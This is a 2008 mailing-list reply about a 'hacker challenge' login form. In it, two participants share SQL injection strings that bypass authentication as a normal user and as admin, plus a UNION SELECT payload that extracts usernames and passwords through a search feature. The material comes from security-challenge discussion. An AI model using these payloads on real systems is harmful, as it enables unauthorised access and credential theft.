Re: hacker challenge... pwn3d login form

["Vivek P" <iamherevivek () gmail com>]

Jorge,

I think misdirection was a little arbit!

Normal User access (no user creation needed / could shut down DB!!)

 '--
 ' --/*



Admin

admin' --
admin' -- /*


Thanks

On Sun, Sep 7, 2008 at 4:25 AM, GulfTech Security Research
<security () gulftech org> wrote:
> Hi Jorge,
>
> Did you say the cookie bit to throw people off? I notice that basically the cookie is using an md5'ed version of the 
> username as the id, and I get that, but I actually got in by using the username "admin' -- /*" and the password "1".
>
> Also, I have been able to exploit the search feature to get this information also by sending a query like this.
>
> -99' UNION SELECT 1,2,username,password,5 FROM members -- /*
>
> Kind Regards,
>
> James
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Top 5 Common Mistakes in Securing Web Applications
> Get 45 Min Video and PPT Slides
>
> www.cenzic.com/landing/securityfocus/hackinar
> ------------------------------------------------------------------------



--
Regards

Vivek P Nair
VP Technology
Appin Software Security Private Limited



d3@dbr@1n - I though i would change the world, they wouldnt gimme the
source code!!

Three ways to gain Success

1. know more than others
2. work more than others
3. expect less than others

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes in 
Securing Web Applications
Get 45 Min Video and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------